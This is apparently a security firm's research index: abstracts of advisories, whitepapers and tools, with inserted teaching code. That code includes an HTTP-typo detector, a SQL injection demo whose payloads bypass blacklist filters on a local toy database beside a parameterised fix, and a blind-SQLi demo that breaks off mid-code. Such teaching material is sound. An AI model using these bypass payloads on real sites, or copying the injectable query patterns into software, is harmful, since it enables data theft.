Cyber Security

Ivanti Zero Day – Threat Actors observed leveraging CVE-2021-42278 and CVE-2021-42287 for quick privilege escalation to Domain Admin 

Authors: David Brown and Mungomba Mulenga

TL;DR: NCC Group has observed what we believe to be the attempted exploitation of CVE-2021-42278 and CVE-2021-42287 as a means of privilege escalation, following the successful compromise of an Ivanti Connect Secure VPN using the following zero-day vulnerabilities reported by Volexity [1] on 10/01/2024: By…


The Spelling Police: Searching for Malicious HTTP Servers by Identifying Typos in HTTP Responses

At Fox-IT (part of NCC Group) identifying servers that host nefarious activities is a critical aspect of our threat intelligence. One approach involves looking for anomalies in responses of HTTP servers. Sometimes cybercriminals that host malicious servers employ tactics that involve mimicking the responses of legitimate software to evade detection.…
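As an added illustration of the approach (example code written for this page, not Fox-IT's or NCC Group's tooling; the header list, reason-phrase table and both sample responses are constructed assumptions), the checker below parses raw HTTP responses and flags header names that sit within a short edit distance of a standard header without being one, plus reason phrases that do not match their status code:

```python
"""Flag HTTP responses that contain near-miss spellings of standard headers.

Added example for this page, not Fox-IT/NCC Group tooling. The header list,
reason phrases and sample responses below are constructed for the demo.
"""

# Header names a well-behaved origin server is expected to emit. A name that is
# close to one of these but not equal to it is a typo candidate. Assumption: a
# production tool would use the full IANA header registry instead.
KNOWN_HEADERS = {
    "content-type", "content-length", "server", "date", "connection",
    "cache-control", "set-cookie", "location", "last-modified", "etag",
    "x-powered-by", "content-encoding", "transfer-encoding", "expires",
    "pragma", "vary", "accept-ranges", "keep-alive", "www-authenticate",
    "age", "via",
}

# Standard reason phrases; a mismatch such as "200 0K" is another typo signal.
REASON_PHRASES = {200: "OK", 301: "Moved Permanently", 302: "Found",
                  304: "Not Modified", 403: "Forbidden", 404: "Not Found",
                  500: "Internal Server Error"}


def edit_distance(a, b):
    """Levenshtein distance by dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]


def parse_response(raw):
    """Split a raw HTTP response into (status_line, [(name, value), ...])."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip(), value.strip()))
    return lines[0], headers


def find_typos(raw):
    """Return a list of (observed, expected) anomalies for one response."""
    status_line, headers = parse_response(raw)
    findings = []

    # Status line "HTTP/1.1 404 Not found": compare the reason phrase.
    parts = status_line.split(" ", 2)
    if len(parts) == 3 and parts[1].isdigit():
        expected = REASON_PHRASES.get(int(parts[1]))
        if expected is not None and parts[2] != expected:
            findings.append((parts[2], expected))

    for name, _ in headers:
        lname = name.lower()
        if lname in KNOWN_HEADERS:
            continue
        # Short names get a tighter threshold so legitimate short custom
        # headers are not reported as typos of "date", "vary", etc.
        allowed = 1 if len(lname) < 8 else 2
        nearest = min(KNOWN_HEADERS, key=lambda k: edit_distance(lname, k))
        if 0 < edit_distance(lname, nearest) <= allowed:
            findings.append((name, nearest))
    return findings


def scan(responses):
    """Map label -> findings for every response that has at least one."""
    report = {}
    for label, raw in responses:
        hits = find_typos(raw)
        if hits:
            report[label] = hits
    return report


# Constructed samples: one clean server, one IIS look-alike with typos.
CLEAN = ("HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: text/html\r\n"
         "Content-Length: 5\r\n\r\nhello")
SUSPECT = ("HTTP/1.1 404 Not found\r\nServer: Microsoft-IIS/8.5\r\n"
           "Content-Tpye: text/html\r\nContent-Lenght: 9\r\n\r\nnot found")

if __name__ == "__main__":
    for label, hits in scan([("clean", CLEAN), ("suspect", SUSPECT)]).items():
        print(label, hits)
```

Run over a corpus of banner grabs, the report keys are the hosts worth a closer look; the thresholds are deliberately conservative because a false positive costs analyst time while a miss only costs one candidate.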


Medical Devices: A Hardware Security Perspective

Medical device security is gaining more attention for several reasons. The conversation often gets connected to device safety, that is, the degree to which the risk of patient harm is limited by preventing or controlling for device malfunction. Device security expands the scope of safety by supposing a malicious attacker…


Building WiMap the Wi-Fi Mapping Drone

We’ve published a whitepaper about how we built WiMap, which is a Wi-Fi mapping drone.  The paper includes details of the methods used to create, from parts, a hexacopter capable of being controlled over 3/4G and equipped to perform wireless and infrastructure assessments. We’d love to hear your feedback via…


Fuzzing the Easy Way Using Zulu

Andy Davis, NCC Group’s Research Director presented Fuzzing the Easy Way Using Zulu at the 2014 Nullcon conference in Goa, India. The presentation describes how Zulu has been successfully used to discover high profile bugs and details the motivations for developing the tool. Download our slides


Exploiting CVE-2014-0282

This whitepaper details the vulnerability and examines some of the concepts needed for browser exploitation before describing how to construct a working exploit that exits gracefully. Download whitepaper Authored by Katy Winterborn


Technical Advisory: Command Injection

Vendor: Kinetica
Vendor URL: https://www.kinetica.com/
Versions affected: 7.0.9.2.20191118151947
Systems Affected: All
Author: Gary Swales Gary.Swales@nccgroup.com
Advisory URL / CVE Identifier: CVE-2020-8429
Risk: High (Command Injection on the underlying operating system)

Summary

The Kinetica Admin web application version 7.0.9.2.20191118151947 did not properly sanitise the input for the function getLogs. This lack of sanitisation could be exploited…


Technical Advisory: Gaining root access on Sumpple S610 IP Camera via Telnet; and Unprotected client and server data transmission between Android and IOS clients

Vendor: Sumpple
Vendor URL: http://www.sumpple.com
Versions affected: S610 firmware 9063.SUMPPLE.7601 - 9067.SUMPPLE.7601; Sumpple IP Cam Android V1.1.33 – V1.11; iOS 1.51.5986 (previous versions are also likely to be affected)
Systems Affected: Sumpple S610 WiFi Wireless PTZ Outdoor Security Video Network IP Camera; Sumpple IP Cam Android and iOS mobile application
Author: Sebastian Parker-Fitch (@scorpioitsec)
Advisory…


Security impact of IoT on the Enterprise

We are moving to a time where many ‘things’ that we know and use have the capability to be connected to a network either wired or wirelessly. The way we use technology is becoming more integrated in all aspects of our daily lives and is steadily integrating within the enterprise…


An Introduction to Ultrasound Security Research

Over the past few years there has been an increase in the use of sound as a communications channel for device-to-device communications. This practice has been termed Data-Over-Sound (DOS) and has been billed as a cheap and easy to use alternative to traditional communications protocols such as Wi-Fi and Bluetooth.…


An Introduction to Quantum Computing for Security Professionals

Quantum computing is still in its infancy but is expected to cause major changes to the technology landscape in coming years. Its ability to massively reduce the time taken for processes normally requiring large amounts of processing power is already causing concerns about the future of cryptography and the resistance…


Technical Advisory: Unauthenticated SQL Injection in Lansweeper

Vendor: Lansweeper
Vendor URL: https://www.lansweeper.com/
Versions affected: prior to 7.1.117.4
Systems Affected: Lansweeper application
Author: Soroush Dalili (@irsdl)
Advisory URL / CVE Identifier: https://www.lansweeper.com/changelog/ - CVE-2019-13462
Risk: Critical when MSSQL database is in use (not default)

Summary

The Lansweeper application is agentless network inventory software that can be used for IT asset management. It uses the…


Jenkins Plugins and Core Technical Summary Advisory

15 Security Advisories, 128 Jenkins Plugin Vulnerabilities and 1 Core Vulnerability
118 CVEs, 1 CVE pending, 10 issues with no CVE requested

About the Vulnerabilities

NCC Group Security Consultant Viktor Gazdag has identified 128 security vulnerabilities across Jenkins plugins and one within the Jenkins core with the following distribution: Credentials stored…


Technical Advisory: Multiple Vulnerabilities in Ricoh Printers

Multiple vulnerabilities, ranging from information disclosure to remote code execution, were found in some Ricoh printers. The following vulnerabilities were found to affect some Ricoh printers:

- Multiple Buffer Overflows Parsing HTTP Cookie Headers (CVE-2019-14300)
- Multiple Buffer Overflows Parsing HTTP Parameters (CVE-2019-14305, CVE-2019-14307)
- Buffer Overflow Parsing LPD Packets (CVE-2019-14308)
- No…


Technical Advisory: Multiple Vulnerabilities in Brother Printers

Multiple vulnerabilities, ranging from information disclosure to remote code execution, were found in several Brother printers. The following vulnerabilities were found to affect several Brother printers:

- Stack Buffer Overflow in Cookie Values (CVE-2019-13193)
- Heap Overflow in IPP Attribute Name (CVE-2019-13192)
- Information Disclosure Vulnerability (CVE-2019-13194)

Technical Advisories: Stack Buffer Overflow…


Technical Advisory: Multiple Vulnerabilities in Xerox Printers

Multiple vulnerabilities, ranging from information disclosure to remote code execution, were found in several Xerox printers. The following vulnerabilities were found to affect several Xerox printers:

- Buffer Overflow in Google Cloud Print Implementation (CVE-2019-13171)
- Multiple Buffer Overflows in IPP Service (CVE-2019-13165, CVE-2019-13168)
- Multiple Buffer Overflows in Web Server (CVE-2019-13169,…


Technical Advisory: Multiple Vulnerabilities in Kyocera Printers

Multiple vulnerabilities, ranging from information disclosure to remote code execution, were found in several Kyocera printers. The following vulnerabilities were found to affect several Kyocera printers:

- Multiple Buffer Overflows in Web Server (CVE-2019-13196, CVE-2019-13197, CVE-2019-13202, CVE-2019-13203, CVE-2019-13206)
- Multiple Buffer Overflows in IPP Service (CVE-2019-13204)
- Buffer Overflow in LPD Service…


Technical Advisory: Multiple Vulnerabilities in HP Printers

Multiple vulnerabilities, ranging from Cross-Site Scripting to buffer overflows, were found in several HP printers:

- Multiple Buffer Overflows in IPP Service (CVE-2019-6327)
- Buffer Overflow in Web Server (CVE-2019-6326)
- Multiple Cross-Site Scripting Vulnerabilities (CVE-2019-6323, CVE-2019-6324)
- Cross-Site Request Forgery Countermeasures Bypass (CVE-2019-6325)

Technical Advisories: Multiple Buffer Overflows in IPP Service (CVE-2019-6327) Vendor:…


Technical Advisory: Multiple Vulnerabilities in Lexmark Printers

Multiple vulnerabilities, ranging from information disclosure to remote code execution, were found in several Lexmark printers. The following vulnerabilities were found to affect several Lexmark printers:

- SNMP Denial of Service Vulnerability (CVE-2019-9931)
- Multiple Overflows in Lexmark Web Server (CVE-2019-9930, CVE-2019-9932, CVE-2019-9933)
- Information Disclosure Vulnerabilities (CVE-2019-9934, CVE-2019-9935)
- Information Disclosure Vulnerability…


Technical Advisory: Intel Driver Support & Assistance – Local Privilege Escalation

Vendor: Intel
Vendor URL: http://www.intel.com/
Versions affected: Intel Driver Support Assistance prior to version 19.4.18
Systems Affected: Microsoft Windows
Author: Richard Warren <richard.warren[at]nccgroup[dot]com>
Advisory URL / CVE Identifier: CVE-2019-11114
Risk: Medium

Summary

This vulnerability allows a low privileged user to escalate their privileges to SYSTEM.

Location

Intel Driver Support Assistance – DSAService (DSACore.dll)

Impact

Upon successful…


Technical Advisory: Citrix Workspace / Receiver Remote Code Execution Vulnerability

Vendor: Citrix
Vendor URL: http://www.citrix.com/
Versions affected: Citrix Workspace App versions prior to 1904 and Receiver for Windows versions prior to LTSR 4.9 CU6 version 4.9.6001
Systems Affected: Microsoft Windows
Author: Ollie Whitehouse <ollie.whitehouse[at]nccgroup[dot]com>, Richard Warren <richard.warren[at]nccgroup[dot]com>, Martin Hill <martin.hill[at]nccgroup[dot]com>
Advisory URL / CVE Identifier: CVE-2019-11634
Risk: Critical

Summary

The Citrix Workspace / Receiver client suffers…


Cyber Security in UK Agriculture

This whitepaper addresses the cyber security threat to agriculture and the wider food network. The perspective and primary focus is the United Kingdom but the majority of observations on the structure of markets, technologies and related issues are largely applicable to other countries. Furthermore, some of the recommended actions identified in…


NCC Group Connected Health Whitepaper July 2019

Connected Health is a rapidly growing area with huge innovative possibilities and potential. This is mostly due to the uptake of digital technologies in the health and medical fields that support diagnosis, treatment and management of health conditions. It is however crucially important that security of Connected Health products, systems…


Technical Advisory: Multiple Vulnerabilities in SmarterMail

Vendor: SmarterTools
Vendor URL: https://www.smartertools.com/
Versions affected: prior to Build 6985 (CVE-2019-7214), prior to Build 7040 (CVE-2019-7211, CVE-2019-7212, CVE-2019-7213)
Systems Affected: SmarterMail
Author: Soroush Dalili (@irsdl)
Advisory URL / CVE Identifier: CVE-2019-7214, CVE-2019-7213, CVE-2019-7212, CVE-2019-7211 https://www.smartertools.com/smartermail/release-notes/current
Risk: Critical and High

Summary

The SmarterMail application is a popular mail server with rich features for normal…


Technical Advisory: Multiple Vulnerabilities in MailEnable

Vendor: MailEnable
Vendor URL: https://www.mailenable.com/
Versions affected: versions before 10.24, 9.83, 8.64, 7.62, 6.90 (20th June 2019)
Systems Affected: tested on Enterprise Premium but all versions have been patched
Author: Soroush Dalili (@irsdl)
Advisory URL / CVE Identifier: CVE-2019-12923, CVE-2019-12924, CVE-2019-12925, CVE-2019-12926, CVE-2019-12927 http://www.mailenable.com/Premium-ReleaseNotes.txt http://www.mailenable.com/Premium-ReleaseNotes9.txt http://www.mailenable.com/Premium-ReleaseNotes8.txt http://www.mailenable.com/Premium-ReleaseNotes7.txt http://www.mailenable.com/Premium-ReleaseNotes6.txt
Risk: Critical, High, Medium

Summary

The MailEnable…


Technical Advisory: IP Office Stored Cross Site Scripting (XSS) Vulnerability

Vendor: Avaya
Vendor URL: https://www.avaya.com/
Versions affected: 10.0 through 10.1 SP3, 11.0
Systems Affected: Avaya IP Office
Author: Mattia Reggiani mattia.reggiani[at]nccgroup[dot]com
Advisory URL: https://downloads.avaya.com/css/P8/documents/101054317
Advisory URL / CVE Identifier: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15614
Risk: Medium

Summary

The One-X Web Portal was vulnerable to multiple persistent or stored cross-site scripting (XSS) vulnerabilities. This occurs when JavaScript or HTML code entered as…


Use of Deserialisation in .NET Framework Methods and Classes

These days it is quite common to see a deserialisation flaw in a product. Although awareness around finding and exploiting this type of vulnerability is out there for security researchers, developers can still struggle with securing their code especially when they are not fully aware of dangerous methods and functionalities…


Nine years of bugs at NCC Group

As part of our vulnerability research work at NCC Group we find many vulnerabilities (bugs) in commercial products and systems and for the past nine years we have kept a detailed internal log of these bugs. In this whitepaper prepared by Matt Lewis, Research Director at NCC Group, we…


Third party assurance

Third parties can provide an invaluable resource and service for your organisation. But how far should you go when validating a third party supplier? What does the third party need to be validated against? How can you be confident that the validation process is effective? Is the validating process detrimental…


Public cloud

Whenever an outage on one of these cloud providers occurs, or a data breach of information held by them, the immediate press coverage starts asking whether they really are as secure and reliable as traditionally managed servers. This whitepaper provides an overview of public cloud services and the steps to…


Technical Advisory: SMB Hash Hijacking and User Tracking in MS Outlook

Vendor: Microsoft
Vendor URL: https://www.microsoft.com/
Systems Affected: Microsoft Outlook
Author: Soroush Dalili
CVE Identifiers: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8572, https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11927
Risk: Medium – Possible SMB Hash Hijacking or User Tracking

Summary

Microsoft Outlook could be abused to send SMB handshakes externally after a victim opens or simply views an email. A WebDAV request was sent even when the SMB…


Technical Advisory: Authentication Bypass in libSSH

Vendor: libSSH
Vendor URL: https://www.libssh.org/
Versions affected: Versions of libSSH 0.6 and above, prior to 0.7.6 or 0.8.4
Author: Peter Winter-Smith peter.winter-smith[at]nccgroup[dot]com
Advisory URL / CVE Identifier: CVE-2018-10933 - https://www.libssh.org/security/advisories/CVE-2018-10933.txt
Risk: Critical – Authentication Bypass

Summary

libSSH is a library written in C which implements the SSH protocol and can be used to implement both…


Technical Advisory: Bypassing Workflows Protection Mechanisms – Remote Code Execution on SharePoint

Vendor: Microsoft
Vendor URL: https://www.microsoft.com/
Versions affected: .NET Framework before July 2018 patch
Systems Affected: .NET Framework Workflow library
Author: Soroush Dalili (@irsdl)
Advisory URL / CVE Identifier: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8284
Risk: Critical

Summary

In the .NET Framework, workflows can be created by compiling an XOML file using the libraries within the System.Workflow namespace. The workflow compiler…


Technical Advisory: Mitel MiVoice 5330e Memory Corruption Flaw

Vendor: Mitel
Vendor URL: https://www.mitel.com
Versions affected: 5330e IP Phone
Systems Affected: Mitel MiVoice
Author: Mattia Reggiani mattia.reggiani[at]nccgroup[dot]trust
Advisory URL: https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-18-0009
CVE Identifier: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15497
Risk: Low-High (case dependent) – Denial of Service and possible Remote Code Execution

Summary

The Mitel MiVoice 5330e VoIP device is affected by a memory corruption…


Technical Advisory: Bypassing Microsoft XOML Workflows Protection Mechanisms using Deserialisation of Untrusted Data

Vendor: Microsoft
Vendor URL: https://www.microsoft.com/
Versions affected: .NET Framework before September 2018 patch
Systems Affected: .NET Framework Workflow library
Author: Soroush Dalili (@irsdl)
Advisory URL / CVE Identifier: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8421
Risk: Critical

Summary

In the .NET Framework, workflows can be created by compiling an XOML file using the libraries within the System.Workflow namespace. The workflow compiler…


The disadvantages of a blacklist-based approach to input validation

It’s not uncommon to find websites that attempt to validate user input and block code injection attacks using a blacklist of dangerous characters or keywords. Superficially, this might seem like a common-sense way to protect a website with minimum effort but it can prove to be extremely difficult to comprehensively…
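To make the point concrete, here is an added example (written for this page, not taken from the original paper) against an in-memory SQLite database with a constructed users/secrets schema. Two typical blacklist filters are shown beside the parameterised query that actually closes the hole; each filter is bypassed by a payload that never contains the string it is looking for:

```python
"""Blacklist input validation beside the parameterised query that replaces it.

Added example for this page. The schema, data and filters are constructed.
"""
import re
import sqlite3


def make_db():
    """Constructed demo database: a users table plus one the attacker wants."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER, name TEXT);
        CREATE TABLE secrets (value TEXT);
        INSERT INTO users VALUES (1, 'alice'), (2, 'bob');
        INSERT INTO secrets VALUES ('api-key-0001');
    """)
    return db


BLACKLIST = ["'", "union", "select", "--", ";"]


def blacklist_v1(value):
    """Reject input containing any blacklisted token (case-sensitive)."""
    return not any(tok in value for tok in BLACKLIST)


def blacklist_v2(value):
    """'Improved' filter: strip dangerous keywords case-insensitively, once."""
    for tok in ("union", "select"):
        value = re.sub(tok, "", value, flags=re.IGNORECASE)
    return value


def lookup_v1(db, user_id):
    """Numeric context: no quote needed, so the quote check buys nothing,
    and the keyword check is defeated by changing case."""
    if not blacklist_v1(user_id):
        return None                       # request rejected
    sql = f"SELECT name FROM users WHERE id = {user_id}"   # injectable
    return [row[0] for row in db.execute(sql)]


def lookup_v2(db, user_id):
    """Stripping keywords is defeated by nesting them: UNunionION -> UNION."""
    cleaned = blacklist_v2(user_id)
    sql = f"SELECT name FROM users WHERE id = {cleaned}"   # still injectable
    return [row[0] for row in db.execute(sql)]


def lookup_safe(db, user_id):
    """Positive validation (must be an int) plus a bound parameter: the value
    can never be parsed as SQL, whatever it contains."""
    try:
        uid = int(user_id)
    except ValueError:
        return None
    return [row[0] for row in db.execute(
        "SELECT name FROM users WHERE id = ?", (uid,))]


# Constructed attacker inputs.
CASE_BYPASS = "0 UNION SELECT value FROM secrets"
NESTED_BYPASS = "0 UNunionION SELselectECT value FROM secrets"

if __name__ == "__main__":
    db = make_db()
    print("v1 :", lookup_v1(db, CASE_BYPASS))
    print("v2 :", lookup_v2(db, NESTED_BYPASS))
    print("safe:", lookup_safe(db, CASE_BYPASS), lookup_safe(db, "1"))
```

The lesson generalises: every blacklist encodes a guess about the attacker's spelling, while a bound parameter removes the need to guess.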


Technical Advisory: Unauthenticated Remote Command Execution through Multiple Vulnerabilities in Virgin Media Hub 3.0

Vendor: Virgin Media
Vendor URL: https://www.virginmedia.com/
Versions affected: products before Aug 2018 rollout / 9.1.116V and 9.1.885J
Systems Affected: Hub 3.0
Author: Balazs Bucsay (@xoreipeip)
Advisory URL / CVE Identifier: None
Risk: Critical

Summary

Multiple security vulnerabilities were found in the device’s firmware that could be chained and led to unauthenticated remote command execution.

Location

Multiple…


Ethics in Security Testing

This paper discusses the similarities and differences between professional ethics in the information security industry and ethics in the hacker community. Sources of conflict and shared values of the two are discussed in order to find some reconciliation and come to an understanding of how a shared set of ethics…


Freddy: An extension for automatically identifying deserialisation issues in Java and .NET applications

It has been known for a while that deserialisation of untrusted data can often lead to serious security issues such as code execution. However, finding such issues might not be a trivial task during time-limited penetration testing. As a result, NCC Group has developed a Burp Suite extension called Freddy [1]…


Open Banking: Security considerations & potential risks

The concept of Open Banking is an innovative one. However, as with any new developments surrounding sensitive financial information it is imperative to assess the security implications of these actions. Matthew Pettitt discusses the pros and cons of the planned implementation and potential risks of Open Banking in NCC Group’s…


scenester

Scenester – a tool to visually snapshot a website by supplying multiple user-agents. Designed to aid in discovery of different entry points into an application. For more information and to download the tool, visit our GitHub page here.


port-scan-automation

Automate NMAP scans and custom Nessus policies. Features include:

- Discovers live devices
- Auto-launches port scans on only the discovered live devices
- Can run multiple instances on multiple adaptors at once
- Creates a client Ref directory for each scan
- Outputs all unique open ports in a Nessus-ready format
- Much faster…


Windows DACL Enum Project

A collection of tools to enumerate and analyse Windows DACLs:

- Tool 1: Process Perms
- Tool 2: Windows Stations and Desktops
- Tool 3: Services
- Tool 4: File System
- Tool 5: Registry

For more information and to download the tool visit our GitHub page here.


umap

umap is a USB host security assessment tool, based on Facedancer by Travis Goodspeed.  For more information and to download the tool visit our GitHub page here.


Shocker

A tool to find and exploit servers vulnerable to Shellshock. To download the tool, please visit our Github page here.


Zulu

Zulu is an interactive GUI based fuzzer. The tool is input and output agnostic, therefore when you are happy with using the fuzzing engine that’s driven by the GUI you are only limited by the input and output modules that have been developed for it. To download the tool, please…


whitebox

This prototype was originally designed and developed during Christmas 2008 / 2009 to show how a non-signature-based AV could reliably detect malicious code. For more information and to download the tool, visit our GitHub page here.


vlan-hopping

vlan-hopping is a simple VLAN enumeration and hopping script, developed by Daniel Compton.  For more information and to download the tool, visit our GitHub page here. 


tybocer

Tybocer is a new view on code review. When presented with a new piece of code to review it is useful to search through for common terms, or to hunt down specific definitions of particular functions. For more information and to download the tool visit our GitHub page here.


xcavator

A network data locator using credentials obtained during penetration tests. Xcavator is a tool that scans a range of IP addresses for services that host files (FTP, FTPS and SMB at the moment) and for given credentials it will try to download everything it can and scan within the files…


WindowsJobLock

A Microsoft Windows Process Lockdown Tool using Job Objects, developed by Ollie Whitehouse.  To download the tool visit our GitHub page here.


Technical Advisory: Multiple Vulnerabilities in ManageEngine Desktop Central

Vendor: ManageEngine
Vendor URL: https://www.manageengine.com/products/desktop-central/
Versions affected: 10.0.124 and 10.0.184 verified, all versions <= 10.0.184 suspected
Systems Affected: All
Author: Ben Lincoln <ben.lincoln[at]nccgroup[dot]trust>
Advisory URLs: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5337, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5338, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5339, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5340, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5341, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5342
Risk: Critical (unauthenticated remote code execution)

Summary

Desktop Central is integrated desktop and mobile device management software that helps in managing servers, laptops, desktops, smartphones,…


Technical Advisory: Code Execution by Unsafe Resource Handling in Multiple Microsoft Products

Vendor: Microsoft
Vendor URL: https://www.microsoft.com/
Versions affected: products before July 2018 patch
Systems Affected: Visual Studio, .NET Framework, SharePoint
Author: Soroush Dalili (@irsdl)
Advisory URL / CVE Identifier: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8172 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8260 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8300
Risk: Medium to High

Summary

A number of deserialisation issues within the resource files (.resx and .resources) were reported to Microsoft in January 2018 by…


Technical Advisory: Code Execution by Viewing Resource Files in .NET Reflector

Vendor: Redgate
Vendor URL: https://www.red-gate.com/
Versions affected: prior to 10.0.7.774 (24th July, 2018)
Systems Affected: .NET Reflector
Author: Soroush Dalili (@irsdl)
Advisory URL / CVE Identifier: https://documentation.red-gate.com/ref10/release-notes-and-other-versions/net-reflector-10-0-release-notes (CVE-2018-14581)
Risk: Critical

Summary

It was possible to execute code by decompiling a compiled .NET object (such as a DLL or EXE) with an embedded resource file. An attacker could…


Technical Advisory: Reflected Cross-Site Scripting (XSS) vulnerability in Jenkins Delivery Pipeline plugin

Vendor: Jenkins Delivery Pipeline Plugin
Vendor URL: https://plugins.jenkins.io/delivery-pipeline-plugin
Versions affected: 1.0.7 (up to and including)
Systems Affected: Jenkins
Author: Viktor Gazdag viktor.gazdag[at]nccgroup[dot]trust
Advisory URL / CVE Identifier: https://jenkins.io/security/advisory/2017-11-16/
Risk: Medium – 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) (Reflected Cross-Site Scripting)

Summary

The Delivery Pipeline Plugin is a Jenkins plugin that helps visualise the delivery/build…


The economics of defensive security

While there are many claims that cyber security is an indispensable necessary cost, there is also a body of opinion that cyber security does not always justify its costs and the financial impacts of a breach are frequently either exaggerated or unclear. As a response to these concerns, this whitepaper…


Integrity destroying malicious code for financial or geopolitical gain: A vision of the future?

“We’re entering a new world in which data may be more important than software.” Tim O’Reilly Following from our recent CISO research council, our research team have put together this whitepaper, which explores the evolutionary steps in ransomware and malicious code and what NCC Group’s current perspective is. Ransomware as…


Mobile & web browser credential management: Security implications, attack cases & mitigations

With the exponential increase of online services over the last decade, it is no surprise that the theft of credentials from poorly-secured applications is a growing concern and data breaches are becoming more of a regular occurrence. Even if we manage to secure and lock down these applications, do we…


SOC maturity & capability

Security is a high priority for most organisations. A string of high-profile breaches at big multinational companies has brought home the threat that all organisations face in the modern world. Therefore, a growing number of companies are considering how best to protect themselves and reduce the impact of a…


Adversarial Machine Learning: Approaches & defences

Most of us interact with Artificial Intelligence (AI) or Machine Learning (ML) on a daily basis without even knowing; from Google Translate, to facial recognition software on our mobile phones and digital assistants in financial services or call centres. It is a growing market with ever increasing possibilities across all…


eBook: Breach notification under GDPR – How to communicate a personal data breach

Working closely with our clients both on site or at events, we are finding that several remain unclear on the topic of breach notification under GDPR. There seems to be little, focused guidance on the topic despite the fact that the new regulation will be enforced from May 2018. This…


Technical Advisory: Adobe ColdFusion RMI Registry.bind() Deserialisation RCE

Vendor: Adobe
Vendor URL: https://www.adobe.com/uk/products/coldfusion-family.html
Systems Affected: ColdFusion 2016 update 4 and below, ColdFusion 11 update 12 and below
Author: Nick Bloor (@NickstaDB) / nick.bloor@nccgroup.com
Advisory URL: https://helpx.adobe.com/security/products/coldfusion/apsb17-30.html
CVE Identifier: CVE-2017-11284
Risk: Critical (unauthenticated remote code/command execution)

Summary

Adobe ColdFusion supports Flex integration to enable Flash applications to interact with ColdFusion components. This is achieved using…


Technical Advisory: Adobe ColdFusion Object Deserialisation RCE

Vendor: Adobe
Vendor URL: https://www.adobe.com/uk/products/coldfusion-family.html
Systems Affected: ColdFusion 2016 update 4 and below, ColdFusion 11 update 12 and below
Author: Nick Bloor (@NickstaDB) / nick.bloor@nccgroup.com
Advisory URL: https://helpx.adobe.com/security/products/coldfusion/apsb17-30.html
CVE Identifier: CVE-2017-11283
Risk: Critical (unauthenticated remote code/command execution)

Summary

Adobe ColdFusion supports Flex integration to enable Flash applications to interact with ColdFusion components. This is achieved using…


Managing PowerShell in a modern corporate environment

Following from our recent CISO research council, our research team have put together this whitepaper, which explores the use of PowerShell in a modern corporate environment and how to mitigate the associated threats. Since its introduction in 2006, PowerShell has grown to be a powerful and extensible management tool, allowing for…


Technical advisory: Remote shell commands execution in ttyd

Vendor: tsl0922
Vendor URL: https://github.com/tsl0922/ttyd/ (https://tsl0922.github.io/ttyd/)
Versions affected: 1.3.0 (<=)
Author: Donato Ferrante <donato.ferrante[at]nccgroup[dot]trust>
Patch URL: https://github.com/tsl0922/ttyd/commit/4d31e534c0ec20582d91210990969c19b68ab3b0
Risk: Critical

Summary

ttyd is a cross-platform (e.g. macOS, Linux, FreeBSD, OpenWrt/LEDE, Windows) tool for sharing a terminal over the web, inspired by GoTTY. ttyd may allow remote attackers to execute shell commands on a victim’s system,…


Securing the continuous integration process

Continuous integration (CI) has long left the stage of experimental practices and moved into mainstream software development. It is used everywhere from start-ups to large organisations, in a variety of technology stacks and problem domains, from web applications to embedded software. However, the security implications of introducing CI are often…


Endpoint connectivity

The popularity of USB usage has grown and it has become a common vehicle for spreading malware. As such, the need to protect IT assets from a cyber attack is paramount and from a physical endpoint perspective, this presents a challenging dynamic when wanting to prevent a data breach via…


Database Security Brief: The Oracle Critical Patch Update for April 2007

On the 17th April 2007 Oracle released their 10th Critical Patch Update. This brief discusses the database flaws and EM01 which relates to the Intelligent Agent. Many of the flaws being patched are old issues. For example, DB01 relates to an issue first reported to Oracle in 2002 and another in June…


Buffer Underruns, DEP, ASLR and improving the Exploitation Prevention Mechanisms (XPMs) on the Windows platform

Buffer Underruns and Stack Protection Starting with Windows 2003 Server, Microsoft introduced a number of Exploitation Prevention Mechanisms (XPMs) into their software. Over time these XPMs were refined as weaknesses were discovered [1][2] and more XPMs were introduced. Today the XPMs have been added to Windows XP Service Pack 2…


Data-mining with SQL Injection and Inference

When drilling for data via SQL injection there are three classes of attack – in-band, out-of-band and the relatively unknown inference attack. In-band attacks extract data over the same channel between the client and the web server, for example, results are embedded in a web page via a union select. Out-of-band attacks employ…
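An added, self-contained illustration of the inference class (example code written for this page, not from the original paper; the schema, the `user_exists` oracle and the password are constructed): the only thing the oracle leaks is whether a row matched, yet a binary search over each character's code recovers the whole secret in a few dozen requests rather than one per candidate character.

```python
"""Boolean-based inference (blind) SQL injection against a yes/no oracle.

Added example for this page. Target schema, data and endpoint are constructed.
"""
import sqlite3


def make_db():
    """Constructed target: one table, one privileged row."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (name TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'Tr0ub4dor');
    """)
    return db


class Oracle:
    """The vulnerable endpoint: concatenates input, answers only yes/no."""

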